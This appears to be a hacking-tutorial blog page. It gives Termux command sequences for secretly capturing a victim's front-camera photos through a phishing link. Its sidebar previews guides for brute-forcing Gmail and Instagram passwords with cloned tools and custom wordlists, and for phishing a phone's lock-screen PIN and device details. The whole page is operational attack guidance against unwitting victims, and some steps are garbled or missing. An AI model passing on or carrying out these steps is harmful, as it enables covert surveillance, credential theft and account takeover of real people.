Skip to main content

How to Hack Front Cam of an Android Phone Using Termux

Hack Front Cam Of An Android Phone

Open Termux 



Commands:


$ apt update

$ apt upgrade

$ pkg install git

$ pkg install bash


$ ls

$ cd wishfish

$ ls

$ bash wishfish.sh

TURN OR YOUR HOTSPOT


A window Appears showing how to run we should use ngrok so command


$ 02


*Copy the  link send it to victim after victim open link Victim's front cam snaps will be on your termux*

To Open The images you have to move it from termux to internal storage

$ mv (copy file name) /sdcard/demo/  

{Here demo is a newly created folder you should also create afolder in internal storage before moving}
       

$ ls 

Your files are successfully moved you can see it in your newly created folder🤩🤩🤩


Youtube Video Tutorial:







Comments

Popular posts from this blog

HACK GMAIL ACCOUNT PASSWORD USING TERMUX LATEST 2020

HACK GMAIL ACCOUNT PASSWORD  Open Termux $ pkg update $ pkg upgrade $ pkg install python $ pkg install python2 $ pkg install git $ git clone  https://github.com/ALKR-HACKHECKZ/alkrmail.git $ ls $ cd alkrmail $ ls $ python alkrmail.py An Inter Face will open as "amailhack' Enter 1 For Starting Attack Enter The password File I Have Added My File Pass.txt  You Can Add Your File...Or you Can Add mine Wait For The Right Password  Enjoy🤩 Youtube Video Tutorial : https://youtu.be/N90zM_pB0co

HOW TO HACK INSTAGRAM USING TERMUX LATEST 2020 WOKING TRICK

HACK INSTAGRAM BRUTEFORCE  WOKING TRICK Steps: Termux App link :  https://play.google.com/store/apps/details?id=com.termux&hl=en Open termux: $ pkg upgrade $ pkg update $ pkg install python $ pkg install python3 $ pkg install git $ git clone  https://github.com/ALKR-HACKHECKZ/alkrinsta.git $ ls $ cd alkrinsta  $ ls $ pkg install pip $ pip install requests $ pip install bs4 You can either create a password list using cupp or you can download other password lists. To make Password list using Cupp Follow steps Below $ python3 cupp.py $ python3 cupp.py -i 🤔Give the Needed Information Of Victim and create the password list  🧐To run the created password list you have to rename the file to "pass.txt" $ mv filename.txt pass.txt     {filename.txt= your created password list you can see your password list name by  ls command } $ cat pass.txt $ python alkrinsta.py ⚠️When Asking 

How to hack screelock pin/password using termux

HACK PHONE LOCK PIN/PASSWORD COMMANDS apt update apt upgrade pkg install git git clone  https://github.com/ALKR-HACKHECKZ/lockphish.git cd ls chmod +x * [ TURN ON HOTSPOT ] cd lockphish Pkg install bash bash lockphish.sh Copy link send it to victim Get the ip adress of victim Get the screelock password Get the Device Information Done Enjoy🤩🤩 Youtube Video Tutorial :   https://youtu.be/5U_GFIqtwuI